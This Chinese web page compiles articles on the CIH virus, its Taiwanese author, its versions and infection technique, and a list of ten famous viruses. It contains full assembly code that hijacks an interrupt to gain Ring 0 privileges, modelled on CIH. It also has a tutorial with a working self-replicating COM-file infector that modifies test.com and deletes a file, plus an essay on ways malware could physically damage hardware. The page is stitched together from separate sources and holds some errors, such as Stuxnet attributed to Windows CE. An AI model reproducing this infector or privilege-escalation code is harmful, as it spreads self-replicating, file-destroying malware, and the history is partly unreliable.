陈盈豪是谁,cih病毒是谁编写的

本文目录

cih病毒是谁编写的


CIH(英语又称为 Chernobyl 或 Spacefiller)是一种电脑病毒,其名称源自它的作者当时仍然是台湾大同工学院(现大同大学)学生的电脑技术鬼才陈盈豪的名字拼音缩写。它被认为是最有害的广泛传播的病毒之一,会破坏用户系统上的全部信息,在某些情况下,会重写系统的BIOS。因为CIH病毒的1.2和1.3版,发作日期为4月26日,正好是俄国核电厂灾害“切尔诺贝利核事故”的纪念日,故曾被认为病毒作者撰写动机和切尔诺贝利事件有关,因此CIH病毒也被称作切尔诺贝利(Chernobyl)病毒。
【历史】
1998年9月,雅马哈公司为感染了该病毒的CD-R400驱动提供一个固件更新。1998年10月,用户传播的Activision公司游戏SiN的一个演示版因为在某一用户的机器上接触被感染文件而受到感染。这个公司的传染源来自IBM1999年3月间发售的已感染CIH病毒的一组Aptiva品牌个人电脑。1999年4月26日,公众开始关注CIH首次发作时,这些电脑已经运出一个月了。这是一宗大灾难,全球不计其数的电脑硬盘被垃圾数据覆盖,甚至破坏了BIOS,无法启动。至2000年4月26日,许多损坏发生在亚洲,但是病毒没有传播开来。2001年3月,Anjulie蠕虫病毒被发现,它将CIH v1.2植入感染的系统。现在,CIH不再像他刚出现时分布那么广泛传播,因为人们以对它的威胁有了认知,且它只能运行于旧的Windows 9X操作系统。
这个病毒的死灰复燃是在2001年。一个用珍妮佛洛佩兹的裸照伪装的Vbscript文档里的爱虫病毒的一个变种包含CIH病毒的挂钩例程,从而使该病毒在互联网上传播开来。
一个修改版本是CIH.1106,发现于2002年12月,但是没有严重的破坏性。
只有CIH感染大量发信的计算机蠕虫(如求职信病毒)所使用的程序,或有Anjulie蠕虫病毒参与时,CIH才会被看成是一个威胁。但是CIH病毒只在windows 95,98和windows Me系统上发作,影响有限。
【病毒特征】
CIH以可移植可执行文件格式在Windows 95、Windows 98和Windows ME上传播。CIH不会在Windows NT、Windows 2000或者Windows XP上传播。
由于CIH会感染可执行文件,它会占据一般的可执行文件空余的位置。因此,CIH又有一个绰号叫“空间填充者(Spacefiller)”。这个病毒大小约1KB,但是文件不会增大。它使用从处理器环3到0跳转的方法触发系统调用。
当他发作时,是非常危险的。首先病毒会在硬盘和软盘中从第0扇区开始的第一个兆字节(1024KB)写入零数据。这样经常删除了分区表的内容,将有可能死机。

陈盈豪是谁,cih病毒是谁编写的图1

1998年出现的CIH病毒是第一个破坏计算机


著名的CIH病毒(CIH病毒是发现的首例直接破坏计算机系统硬件的病毒。)
藏王 发表于 2005-3-18 21:04:24
CIH病毒的由来
CIH首先在台湾被发现,根据台北官方的报告,计算机病毒是由24岁的陈盈豪(Chen Ing-Halu)编制的,由于其名字第一个字母分别为C、I、H,所以这可能是计算机病毒名称的由来。
--------------------------------------------------------------------------------
CIH病毒的简介
它是迄今为止发现的最阴险的病毒之一。它发作时不仅破坏硬盘的引导区和分区表,而且破坏计算机系统flashBIOS芯片中的系统程序,导致主板损坏。CIH病毒是发现的首例直接破坏计算机系统硬件的病毒。
--------------------------------------------------------------------------------
CIH病毒的发展历程
CIH病毒v1.0版本:
最初的V1.0版本仅仅只有656字节,其雏形显得比较简单,与普通类型的病毒在结构上并无多大的改善,其最大的"卖点"是在于其是当时为数不多的、可感染Microsoft Windows PE类可执行文件的病毒之一, 被其感染的程序文件长度增加,此版本的CIH不具有破坏性。
CIH病毒v1.1版本:
当其发展到v1.1版本时,病毒长度为796字节,此版本的CIH病毒具有可判断WinNT软件的功能,一旦判断用户运行的是WinNT,则不发生作用,进行自我隐藏,以避免产生错误提示信息,同时使用了更加优化的代码,以缩减其长度。此版本的CIH另外一个优秀点在于其可以利用WIN PE类可执行文件中的"空隙",将自身根据需要分裂成几个部分后,分别插入到PE类可执行文件中,这样做的优点是在感染大部分WINPE类文件时, 不会导致文件长度增加。
CIH病毒v1.2版本:
当其发展到v1.2版本时,除了改正了一些v1.1版本的缺陷之外,同时增加了破坏用户硬盘以及用户主机 BIOS程序的代码,这一改进,使其步入恶性病毒的行列,此版本的CIH病毒体长度为1003字节。
CIH病毒v1.3版本:
原先v1.2版本的CIH病毒最大的缺陷在于当其感染ZIP自解压包文件(ZIP self-extractors file)时,将导致此ZIP压缩包在自解压时出现:
WinZip Self-Extractor header corrupt.
Possible cause: disk or file transfer error.
的错误警告信息。v1.3版本的CIH病毒显得比较仓促,其改进点便是针对以上缺陷的,它的改进方法是:一旦判断开启的文件是WinZip类的自解压程序,则不进行感染。同时,此版本的CIH病毒修改了发作时间。v1.3 版本的CIH病毒长度为1010字节。
CIH病毒v1.4版本:
此版本的CIH病毒改进上上几个版本中的缺陷,不感染ZIP 自解压包文件,同时修改了发作日期及病毒中的版权信息(版本信息被更改为:"CIH v1.4 TATUNG",在以前版本中的相关信息为"CIH v1.x TTIT"),此版本的长度为1019字节。
从上面的说明中,我们可以看出,实际上,在CIH的相关版本中,只有v1.2、v1.3、v1.4这3 个版本的病毒具有实际的破坏性,其中v1.2版本的CIH病毒发作日期为每年的4月26日,这也就是当前最流行的病毒版本,v1.3 版本的发作日期为每年的6月26日,而CIH v1.4版本的发作日期则被修改为每月的26日,这一改变大大缩短了发作期限,增加了其的破坏性。
--------------------------------------------------------------------------------
CIH的特征和行踪
来自权威部门的消息说,CIH是一个纯粹的Windows95/98病毒,这个病毒很独特地使用了 WindowsVxD(虚拟设备驱动程序)技术;该病毒发作时,硬盘一直转个不停,所有数据都被破坏,硬盘分区信息也将丢失;再有就是 CIH病毒发作时也可能会破坏某些类型的主板上的电可改写只读存储器(E2PROM)的BIOS。BIOS即电脑中的"基本输入/输出系统", 存放的是系统最基本的硬件参数和驱动程序,一旦被破坏则系统根本无法启动,唯一的修复途径就是送回厂家重新烧入BIOS。此时如果用户不想送回厂家"重烧",而使用BIOS升级软件重新烧入BIOS,升级软件将报告"E2PROM型号不对"的错误。这就是说, CIH病毒已具备了对硬件的相当破坏能力,它可以彻底摧毁计算机。
一般用户都知道,传统意义上的病毒破坏的是数据而非硬件。因此,经常进行数据备份与软件更新,能够一定程度上防止数据文件被病毒破坏,而且即使文件被传染病毒,也可使用反病毒软件加以清除,至少可以尽最大可能恢复系统。防病毒专家认为,威胁到计算机硬件的 CIH的出现,意味着病毒与反病毒的技术较量已开始发生质的改变。
"根据初步跟踪分析,CIH病毒是从海外传入内地的"北京冠群金辰软件有限公司反病毒专家王铁肩介绍说: "目前该病毒的传播主要通过互联网和电子邮件,当然随着时间的推移,其传播主要还是通过软盘或光盘。"据权威病毒搜集网获得的信息, CIH病毒"原体"加"变种"一共有五种,它们的相互区别在于"原体"会使受感染文件增长,但不具破坏力;而"变种"不增长受感染文件,但有很强的破坏性,它们的发作时间分别为 4月26日、 6月26日和每月的26日。
--------------------------------------------------------------------------------
CIH 病毒原理的应用--物理内存的读写
Windows 95/98应用程序无法直接读写物理内存,如果使用VxD编程,可以调用VMM功能_MapPhysToLinear 将物理地址映射到线性地址再进行修改,但是这样就必须单独写一个VxD,比较麻烦,那么能不能在应用程序中直接调用VMM功能呢?一般不能,因为VMM功能要在Ring 0上调用,而一般的应用程序工作在Ring 3上,那么为什么CIH 病毒能够调用VMM功能呢,CIH病毒使用了一种技术,采用Intel处理器的中断从Ring 3转到Ring 0,我们完全可以借鉴这种技术来调用VMM功能, 下面的程序演示了如何修改物理内存--以在Windows 95加密程序中修改加密扇区大小(物理地址0000:0525H)为例:
;****************************************************************************
;* Windows 95加密软件核心模块之一--磁盘扇区大小修改程序 *
;* *
;* 本程序在Windows 95下修改内存物理地址0000:0525 处的磁盘扇区大小字节, *
;* 为了能够修改物理地址,本程序使用了VMM 功能_MapPhysToLinear将物理地址映射 *
;* 到线性地址进行修改。为了在应用程序中调用VMM 功能,本程序使用了CIH 病毒的 *
;* 原理,使用中断将系统由Ring 3转到Ring 0,然后调用VMM 功能。 *
;* 本程序中的过程ChangeSectorSize在VC中的原型可以写成: *
;* *
;* void _stdcall ChangeSectorSize(BYTE SectorSize); *
;****************************************************************************
.386p
.model flat,stdcall
;修改的中断号,如果本中断号改成3则可以防止Soft-ICE跟踪!
HookExceptionNo EQU 05h
.data
IDTR_1 db 6 dup(0) ;保存中断描述符表寄存器
OldExceptionHook dd 0 ;保存原先的中断入口地址
.code
;修改扇区大小过程
ChangeSectorSize PROC SectorSize:BYTE
push eax
;获取修改的中断的中断描述符(中断门)地址
sidt IDTR_1
mov eax,dword ptr IDTR_1+02h
add eax,HookExceptionNo*08h+04h
cli
;保存原先的中断入口地址
push ecx
mov ecx,dword ptr [eax]
mov cx,word ptr [eax-04h]
mov dword ptr OldExceptionHook,ecx
pop ecx
;设置修改的中断入口地址为新的中断处理程序入口地址
push ebx
lea ebx,NewExceptionHook
mov word ptr [eax-04h],bx
shr ebx,10h
mov word ptr [eax+02h],bx
pop ebx
;执行中断,转到Ring 0(与CIH 病毒原理相似!)
push ebx
mov bl,byte ptr SectorSize ;扇区大小保存在bl寄存器中
int HookExceptionNo
pop ebx
;恢复原先的中断入口地址
push ecx
mov ecx,dword ptr OldExceptionHook
mov word ptr [eax-04h],cx
shr ecx,10h
mov word ptr [eax+02h],cx
pop ecx
;修改扇区大小过程结束
sti
pop eax
ret
ChangeSectorSize ENDP
;新的中断处理程序
NewExceptionHook PROC
push eax
push ebx
push ecx
push edx
push esi
;修改扇区大小
push dword ptr 00000000h ;必须为0
push dword ptr 00000001h ;字节数
push dword ptr 00000525h ;物理地址0000:0525
int 20h
dd 0001006ch ;以上两条指令相当于 VMMCall _MapPhysToLinear
pop esi
pop esi
pop esi
mov byte ptr [eax],bl ;修改扇区大小
;中断处理程序结束
pop esi
pop edx
pop ecx
pop ebx
pop eax
iretd
NewExceptionHook ENDP
end
本过程可以被C语言调用,编译方法:ml /c /coff w95enc.asm。请用MASM 6.11以上版本编译,不需要DDK。将编译生成的OBJ文件插入VC的工程中,并在VC程序中写上函数原型说明,就可以调用了。
--------------------------------------------------------------------------------
病毒是怎样破坏硬件的
最近,CIH病毒把大家搞得人心惶惶,掀起了不小的波澜。以前的各种病毒最多只能破坏硬盘数据,而CIH 却能侵入主板上的Flash BIOS,破坏其内容而使主板报废。CIH的教训告诉我们:不要轻视病毒对硬件的破坏。 很多人现在已经开始担忧:CIH越来越凶猛,同时会不会有更多的破坏硬件的病毒出现?
其实,本人分析了一下。病毒破坏硬件的"手段",不外乎有以下几种:
1.破坏显示器
众所周知,每台显示器都有自已的带宽和最高分辨率、场频。早期生产的14英寸彩色显示器,带宽大约只有35-45MHz,对应的最高分辩率为1024×768@60Hz场频;目前的14英寸彩色显示器,带宽大都有60MHz,对应的最高分辨率为1024×768@75Hz场频;15英寸彩色显示器(高档的),带宽有110MHz,对应的最高分辨率为1280×1024@85Hz场频。大家可以查看一下显示器的说明书,上面都有场频与最高分辨率的配合。若其中有一项超过,就会出现花屏,严重了就会烧坏显示器。病毒可以通过篡改显示参数来破坏显示器(如把分辨率、场频改到显卡能支持的最高档等)。虽然新型显示器有DDC标准化与系统联络,但病毒想钻空子并不难。所以大家如果发现在使用过程中显示器出现了花屏, 要立即关掉显示器的电源,重新启动后进入安全模式再找原因。
2.超外频、加电压破坏CPU、显卡、内存等
目前新型主板采用"软跳线"的越来越多,这正好给病毒以可乘之机。所谓"软跳线" 是指在BIOS中就能改动CPU的电压、外频和倍频。病毒可以通过改BIOS参数,加高CPU电压使其过热而烧坏,或提高CPU的外频,使CPU和显卡、内存等外设超负荷工作而过热烧坏。这类事件的前兆就是死机。所以,如果发现机器经常死机,就要赶紧到 CMOS中看看以上参数是否有改动。可喜的是,目前很多新出的主板都有CPU温度监测功能,超温后立即降频报警,可以基本杜绝烧坏硬件的情况发生。
3.超"显频"破坏显卡
目前很多中高档显卡如Voodoo等都可以手动改变其芯片的频率,并且改的方法更简单:在Windows 9x注册表里改。病毒改动了"显频",显卡也就容易超负荷工作而烧坏。这种事件的前兆也是死机。所以,死机时也不要忽视对"显频"的检查。另外还有一种减少烧坏显卡的可能性的办法,那就是……(什么?你已经安了两个风扇了!?)
4.破坏光驱
光驱中的光头在读不到信号时就会加大激光发射功率,这样长期下去对光驱的寿命极为不利。有人做实验,让正常的光驱不停的读取一张划痕很多,信号较弱的光盘,28小时以后光驱就完蛋了。病毒可以让光头走到盘片边缘无信号区域不停的读盘,结果光头读不到信号,便加大发射功率不停地读,要不了几天,光驱就要"No Disc"了。 所以要经常注意光驱灯的闪亮情况,判断光驱是否在正常工作。
5.破坏主板、显卡的Flash BIOS
这就是现在的CIH病毒破坏主板的方式。病毒用乱码冲掉了BIOS中的内容,使机器不能启动。 不过现在很多主板都有带有Flash BIOS写保护跳线,可以有效的防止CIH病毒破坏主板。但是不要忘了,很多显卡也有Flash BIOS, 说不定哪一天就会冒出一种破坏显卡BIOS的病毒。所以还是小心一点为好,这可没有什么特效药啊!
6.破坏硬盘
大家都知道,分区、高级格式化对硬盘都没有什么损伤,惟独低级格式化对硬盘的寿命有较大的影响。据说硬盘做上10次低级格式化就会报废。如果出现一种病毒,不停的对硬盘的0磁道做低格式化(做10次最多只需用几秒钟!),0道坏了再做1道……你的硬盘容量就会一点一点(这一点好不小啊!)地被蚕食,而且0、1、2……道坏了,要想再使用该硬盘,就得在BIOS中重新设定起始磁道,再低级格式化,非常麻烦。其实,该病毒有一个非常简单而有效的预防方法,那就是将BIOS中的Boot Sector Virus Protection(引导区病毒写保护)设为Enable(打开)。笔者做过实验,将上述开关打开的情况下,使用各种低级格式化软件(包括BIOS中自带的)对硬盘进行低格,BIOS都会报警(报告说有程序企图重写引导区,问是否继续),按N就可以防止。要知道BIOS程序掌管着系统的最高控制权, 应该没有什么东西可以冲破其防线(你按Y是另外一回事)。若发现上述情况,赶紧Reset,然后进行杀毒不过,如果你是在装Win 98等操作系统或System Commander等软件时碰到该情况,就大可不必理会它,困为这些软件安装时都有要重写引导区。不过劝你安装这些软件时最好先把写保护关掉,否则容易出现死机现象!
7.浪费喷墨打印机的墨水喷墨打印机的喷头特别容易堵塞,为此打印机公司特别发明了专门浪费墨水的"清洗喷头"功能,即让大量墨水冲出喷头,清除杂物。这项功能可以用软件控制实现,于是乎病毒便神不知鬼不觉的一次次调用该功能,而你却对打印机的呻吟声却听而不见。当你发现时,大量的墨已经被浪费了。这种病毒唯一的预防办法就是……不用打印机时把打印机关了。其实,只要你常注意一下打印机上的模式灯就可以了,清洗喷头时它通常是一闪闪的。另外还要仔细倾听它的呻吟声,清洗喷头时打印头总是要来回走动几下的(为了加热)。
一口气写了7条,其实大家心里明白,破坏硬件的歪点子多着呢!本文只是想为刚从CIH阴影中爬出的朋友提个醒:成功之路千万条(当然是编病毒者的成功),打死CIH,还有后来者。千万要发扬各种精神, 保护你的血汗钱筑成的电脑!另外,本文中几乎每一条都有附预防办法(虽然有些看起来像废话),但这些办法也不是万能的(还要注意不能顾此失彼),以后谁的"鸡"若被新病毒搞坏了,我可不负责任哟!
CIH是使用什么方法进行感染的?
就技巧而言,其原理主要是使用Windows的VxD(虚拟设备驱动程序)编程方法,使用这一方法的目的是获取高的CPU权限,CIH病毒使用的方法是首先使用SIDT取得IDT base address(中断描述符表基地址),然后把IDT的INT 3的入口地址改为指向CIH自己的INT3程序入口部分,再利用自己产生一个INT 3指令运行至此CIH自身的INT 3入口程序 出,这样CIH病毒就可以获得最高级别的权限(即权限0),接着病毒将检查DR0寄存器的值是否为0,用以判断先前是否有CIH病毒已经驻留。如DR0的值不为0,则表示CIH病毒程式已驻留,则此CIH副本将恢复原先的INT 3入口,然后正常退出(这一特点也可以被我们利用来欺骗CIH程序,以防止它驻留在内存中,但是应当防止其可能的后继派生版本)。如果判断DR0值为0,则CIH病毒将尝试进行驻留,其首先将当前EBX寄存器的值赋给DR0寄存器,以生成驻留标记,然后调用INT 20中断,使用VxD call Page Allocate系统调用,要求分配Windows系统内存(system memory),Windows系统内存地址范围为C0000000h~FFFFFFFFh,它是用来存放所有的虚拟驱动程序的内存区域, 如果程序想长期驻留在内存中,则必须申请到此区段内的内存,即申请到影射地址空间在C0000000h以上的内存。
如果内存申请成功,则接着将从被感染文件中将原先分成多段的病毒代码收集起来,并进行组合后放到申请到 的内存空间中,完成组合、放置过程后,CIH病毒将再次调用INT 3中断进入CIH病毒体的INT 3入口程序,接着调用INT20来完成调用一个IFSMgr_InstallFileSystemApiHook的子程序,用来在文件系统处理函数中挂接钩子,以截取
文件调用的操作,接着修改IFSMgr_InstallFileSystemApiHook的入口,这样就完成了挂接钩子的工作,同时Windows默认的IFSMgr_Ring0_FileIO(InstallableFileSystemManager,IFSMgr)。服务程序的入口地址将被保留,以便于CIH病毒调用,这样,一旦出现要求开启文件的调用,则CIH将在第一时间截获此文件,并判断此文件是否为PE格式的可执行文件,如果是,则感染,如果不是,则放过去,将调用转接给正常的Windows IFSMgr_IO服务程序。CIH
不会重复多次地感染PE格式文件,同时可执行文件的只读属性是否有效,不影响感染过程,感染文件后,文件的日期与时间信息将保持不变。对于绝大多数的PE程序,其被感染后,程序的长度也将保持不变,CIH 将会把自身分成多段,插入到程序的空域中。完成驻留工作后的CIH病毒将把原先的IDT中断表中的INT 3入口恢复成原样。
病毒的编写是一种高深技术,真正的病毒一般都具有:传染性、隐藏性(又称潜伏性)、破坏性。现在的病毒种类也不少,如平常的传染可执行文件的病毒、宏病毒等等。但原始的、破坏性最大的病毒还是传染可执行文件的病毒(像CIH病毒),而这些病毒一般都是用汇编语言编写的。有许多人对病毒有着好奇和向往,但是往往又因为汇编语言的难学等问题望而却步。
这篇文章就是教给大家如何制作一个简单的程序,这个程序虽然算不上病毒但是具有病毒的传染性,而往往病毒的传染性是平常人最难做到的。
好啦,现在转入正题,先讲讲病毒是如何传染的,传染后又如何在被染的文件中执行的,其实道理非常简单:病毒一般将其代码写入执行文件的尾部,然后使执行文件在执行时先执行文件尾部的病毒代码,然后再跳回原代码处执行。现在举一个试例进行说明:
;-----------------------------------------
;功能:感染当前文件夹的test.com文件
; 并删除当前文件夹的del.txt文件
; 显示预设的字符串
CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
main PROC NEAR
mainstart:
CALL vstart ;病毒的代码开始处
vstart:
POP SI ;得到当前地址
MOV BP,SI ;保存当前地址
PUSH SI
MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串
MOV DX,SI
INT 21h
POP SI
ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节
MOV DI,100h ;目的地址
MOV AX,DS:[SI] ;开始复制
MOV DS:[DI],AX
INC SI
INC SI
INC DI
INC DI
MOV AX,DS:[SI]
MOV DS:[DI],AX
MOV SI,BP ;恢复地址值
MOV DX,OFFSET delname-OFFSET vstart
ADD DX,SI
MOV AH,41h
INT 21h
MOV DX,OFFSET filename-OFFSET vstart ;得到文件名
ADD DX,SI
MOV AL,02
MOV AH,3dh ;写文件
INT 21h
JC error
MOV BX,AX ;文件句柄
MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节
ADD DX,SI
MOV CX,4
MOV AH,3fh
INT 21h
MOV AX,4202h ;到文件尾
XOR CX,CX
XOR DX,DX
INT 21h
MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方
ADD DI,2
ADD DI,SI
SUB AX,4
MOV DS:[DI],AX
ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒
MOV DX,SI
MOV vsizes,OFFSET vends-OFFSET mainstart
MOV CX,vsizes
MOV AH,40h
INT 21h
MOV SI,BP ;定位到文件头
MOV AL,0
XOR CX,CX
XOR DX,DX
MOV AH,42h
INT 21h
MOV AH,40h ;将新的文件头写入
MOV CX,4
MOV DX,OFFSET new4byte-OFFSET vstart
ADD DX,SI
INT 21h
MOV AH,3eh ;关闭文件
INT 21h
error:
MOV AX,100h
PUSH AX
RET
main ENDP
yuan4byte:
RET
DB 3 DUP (?)
vsizes DW 0
new4byte DB ‘M‘,0e9h,0,0
filename DB "test.com",0
delname DB "del.txt",0
message DB "He he he he!"
DB 0dh,0ah,"$"
vends:
start:
MOV AX,CSEG
MOV DS,AX
MOV SS,AX
CALL main
MOV AX,4c00h
INT 21h
CSEG ENDS
END start
以上就是一个简单的可以传染COM文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序。如何???不难吧。
附:
COM文件执行时将COM文件内所的所有内容COPY到内存, 起始地址是100,然后进行执行
没有任何有关节啦、段啦这些属性,所以COM文件病毒是最简单最简单的病毒。

陈盈豪是谁,cih病毒是谁编写的图2

世界十大病毒是什么


1.代号:爬行者Creeper
感染系统:ARPANET大型机
发现时间:1971年
传播方式:就是不断自我复制。
杀伤力:不断膨胀,将硬盘塞满
什么情况:
爬行者可能是人类所知的第一个病毒类程序,或者这个程序基本上都称不上是病毒程序,更确切的来说,它就是一段恶意代码。病毒的作者是马萨诸塞州剑桥市一个企业的员工Bob Thomas ,此人曾参与了互联网前身“阿帕网”的搭建工作。该程序的出现要归因于实验室的一次测试,测试的目的是要了解是否能创造出一种可自我复制的软件。这个会不断自我复制,并能够在最早的互联网中进行远程复制的病毒并没有造成什么危害,但是它的诞生却开启了数字时代整整四十年的噩梦,而且至今挥之不去。
2.代号:MyDoom
感染系统:Windows 98/2000/XP
发现时间:2004年1月
传播方式:电子邮件。
杀伤力:MyDoom是迄今为止造成经济损失最大的病毒,385亿美元是它肆虐后的代价。当然它也荣登史上传播速度最快的病毒。
什么情况:
在MyDoom发作的那几天,全球至少有三分之一的电脑无法联网,因为网速实在太慢了。MyDoom用仅一周的时间就感染了全球超过千万台电脑,2004年的2月份,对于刚刚遭遇过寒冬的IT行业来说,那个月更让人颤栗的是,全球每12封电子邮件中就至少有1封是带着MyDoom病毒的邮件。
MyDoom第一个变种发作时通过发送大量的伪造攻击邮件,导致了SCO公司网站和邮件系统全面谈话。有人猜测原因大概与SCO想对Linux收取授权费用有关,随后MyDoom的第二个变种又将目标瞄向了微软公司。不过由于微软的储备有足够多的人才,这次攻击最终被微软化解掉,但是仍有人抱怨那段时间访问微软网站速度很慢,其实或许不是访问微软速度很慢,而是在MyDoom的肆虐下,全球都很慢。
微软和SCO事后声称,如果有人能够告诉他们谁是MyDoom的作者,他们将分别奖励线人25万美金。不过FBI和CIA折腾了一番之后都无功而返,就像所有老套的资本主义笑话一样,他们声称病毒制作者在俄罗斯。
3.代号:CIH
感染系统:Windows 95/98
发现时间:1998年9月
传播方式:从正版到盗版各种EXE文件。
杀伤力:不夸张的说,CIH以其惊人的破坏能力和感染速度,着实教育了当时使用盗版成风的国人,至少很多人都醒悟到要买套正版杀毒软件,最终它造成全球5亿美元的损失,同时也带动了国内数以亿计的杀毒市场。
什么情况:
你的硬盘是不是在狂转?电脑开机一片黑屏?被CIH感染的计算机的硬盘会狂转,随后所有的电脑中的EXE程序均会遭到破坏与病毒感染,成为新的感染源。接下来CIH会在硬盘主引导区中依次写垃圾数据,直至硬盘的数据全部被破坏彻底为止,
让你想恢复数据都无从入手。最终的必杀手段是将电脑主板的BIOS信息全部清除,让你的电脑彻底瘫痪。
CIH病毒的作者是中国台湾的陈盈豪,在CIH病毒成为一夜成名之后,台湾军方也注意到陈盈豪,想将他调入台湾电子战特种部队,可惜在经过一番体检之后,台湾军方医生认为陈盈豪患有“轻度抑郁症”,不仅没有将他调入台湾电子战特种部队,反而责令他提前退役。现如今回看当年,陈盈豪被医生描述为轻度抑郁症的病症表现只不过是所有网络宅男的标准特征。
如今陈盈豪在硬件知名厂商技嘉公司工作,有意思的是当年CIH爆发后让许多电脑用户人心惶惶,生怕被CIH烧毁了主板BIOS无法挽救,而这是技嘉公司看准了这个噱头,生产了双CMOS主板狠赚了一笔。而在中国内地,CIH病毒也改写了国内杀毒软件的格局,救活了原来并不出名的瑞星。微软应该是CIH病毒事件中最郁闷的厂商,Windows 98刚刚发布不久,就被证明了存在一系列重大设计缺陷,让许多Linux支持者找到了口实。
4.代号:熊猫烧香
感染系统:Windows XP
发现时间:2006年10月16日
传播方式:端口攻击和恶意脚本。
杀伤力:国内至少有100万台电脑受到感染。
什么情况:
电脑所有可执行文件的图标全部变成一只举着三只香的胖胖的熊猫,而且所有的可执行文件都无法执行。当你试图通过Ghost还原的时候,会发现硬盘中的GHO磁盘镜像文件也被病毒删除了。立刻杀毒?抱歉,绝大多数你能够想得起来的杀毒软件都会被病毒强行终止进程。熊猫烧香还仿照冲击波等病毒的特点,通过Windows系统共享漏洞和用户弱口令攻击感染局域网内的电脑,并同时释放Autorun.inf感染U盘和移动硬盘。
最后连HTML等网页格式文件它也没有放过,熊猫烧香病毒一旦发现网页文件,就会通过iframe标记将病毒代码插入到网页中。而许多网站维护人员会误将这些带毒网页上传到网站中,造成更大范围的感染。其实熊猫烧香病毒是一个没有太多新技术的病毒,只不过病毒作者将之前N种病毒传播特点都集中在了这一个病毒上,等于将鹤顶红、敌敌畏、氰化物、砒霜和三聚氰胺等几十种毒药混在了一起,自然吃上一口就口吐白沫了。
最绝的是,病毒作者李俊将这个病毒分别买个了120个小黑客,鼓励教导他们广撒网多抓鸡。李俊自己也购买了服务器,专门用作病毒更新,创下了一天更新8次的病毒升级记录,可以堪称史上最勤奋的病毒作者。当然,这么勤劳最终的结果自然是被抓判刑。
5.代号:I Love You 又名 爱虫
感染系统:Windows 系统
发现时间:2000年5月30日
传播方式:电子邮件。
杀伤力:4500万台电脑遭受感染。
什么情况:
在那个互联网刚刚呈现第一股热潮的时代,那个没有Facebook没有Twitter只能够用Email沟通的时代。当某一天早晨,你收到了一封写有“I Love You ”标题的电子邮件你会点开吗?在2000年的那个六一儿童节的前一天,许多寂寞的互联网Geek和宅男都点开了这样一封邮件。从此,史上感染力最强的病毒诞生了。爱虫病毒总共感染了4500万电脑,比第二名红色代码足足多出100多倍。
6.代号:冲击波
感染系统:Windows 系统
发现时间:2003年8月
传播方式:电子邮件。
杀伤力:全球80%的Windows系统遭受攻击
什么情况:
电脑突然弹框告诉你还有59秒它就要自动重启了,没有什么原因,也没有什么理由,随后就是一遍又一遍的重启。而内网中很快也会出现其它和你同病相怜的电脑,很快就如同流行性感冒一样,重启电脑随处可以见。随后未中毒的计算机也会出现访问网络速度减慢的情况。当高手们告诉你中毒了的时候,并且告诉你需要修补某个Windows补丁时,你却发现你无法打上这个补丁了,这就是曾经肆虐互联网的冲击波病毒。
冲击波病毒虽然不是第一个利用Windows漏洞传播的病毒,但是确实第一个造成大面积危害的。特别是中国国内许多用户的Windows并非正版,因此不能够使用微软提供的Windows Update服务,导致了病毒灾情的加剧,事后微软更改了自己的补丁修补策略,盖茨为此开出了50万美金的悬赏。而联邦调查局也的确抓住了一个制作冲击波病毒变种的倒霉蛋,18岁的Jeffrey Lee Parson,不过他只是一个变种作者,并非冲击波的原作者。
7.代号:Melissa梅丽莎 又名辛普森一家
感染系统:Windows系统下的Outlook
发现时间:1999年3月26日
传播方式:电子邮件。
杀伤力:雅虎、美国在线、微软、朗讯、英特尔和美国多所知名大学网站的服务器,均因为Melissa病毒泛滥而瘫痪。
什么情况:
在1999年3月访问过成人新闻组并下载过一个Word文档的用户都没有留意到,自己的Outlook电子邮件程序开始悄悄地自动给自己地址簿里的好友发送电子邮件了。而且每一封电子邮件都带着一个名为List.doc的带毒文件。这可能是网络社会化六度关系SNS最早证明自己是真理的地方。随着受害者的好友、好友的好友和好友的好友的好友不断的叠加感染,最终梅丽莎病毒造成了互联网的大瘫痪。
而梅丽莎病毒的亲爹大卫史密斯开发这个病毒的原因竟然是爱上了一个迈阿密的脱衣舞女,他为她着迷,并最终用这个脱衣舞女的名字命名了自己的病毒。他自己最终被判刑20个月。
8.代号:尼姆达
感染系统:Windows 所有32位系统
发现时间:2001年9月18日
传播方式:FTP、电子邮件、IM软件、网页。
杀伤力:造成3.7亿元经济损失
什么情况:
虽然很多人躲过了红色代码的攻击,但那一年绝大多数用户没有逃过尼姆达的攻击,而原因仅在于红色代码只攻击服务器系统,而尼姆达则感染所有32位Windows系统,从Windows 95到当时最新的Windows 2000,统统不放过。
而尼姆达病毒当时的感染方式也非常多样,它可以通过文件感染、电子邮件传播、系统漏洞、网页传播四种方式进行传播。虽然后来的熊猫烧香病毒的感染手段超越了尼姆达,但是就病毒感染途径的多样化而言,尼姆达当时的确是最具与杀伤力的病毒。
9.代号:灰鸽子
感染系统:Windows 系统
发现时间:2001年
传播方式:多种网络传播方式
杀伤力:灰鸽子
什么情况:
中了灰鸽子会出现什么情况?事实是什么情况都会出现。灰鸽子能够记录你的键盘击键记录,能够远程开启摄像头,打开麦克风,能够下载你电脑里的任何文件。几乎你能够想到的电脑本机操作,黑客都可以通过灰鸽子远程控制实现。从灰鸽子诞生的2001年到销声匿迹的2008年之间,正好遭遇了全民皆黑客的年代,灰鸽子因为操作简单,上手快,很快的成为当时最泛滥的木马病毒,近中国国内至少有上千万台电脑感染过灰鸽子病毒。
有趣的是,灰鸽子的作者最后并没有像熊猫烧香的李俊一样,一直用灰鸽子赚钱。在2008年之后该作者转而开发防火墙,专门用来防护自己的灰鸽子。
10.代号:Stuxnet蠕虫 超级工厂病毒
感染系统:Windows CE系统
发现时间:2010年6月
传播方式:U盘
杀伤力:导致伊朗布什尔核电站瘫痪。
什么情况:
2010年7月份,全球几大杀毒软件厂商突然开始分析一个名为Stuxnet的病毒,这个病毒的独特之处在于,它并不攻击传统的Windows系统,而是将目标放在了极小众、极专业的西门子Win CC工控系统上,这个系统的原型就是广为人熟知的Windows CE。随后安全研究员发现,该病毒针对目标非常具体,它会通过U盘感染将自己摆渡到目标工控机中,然后发作。
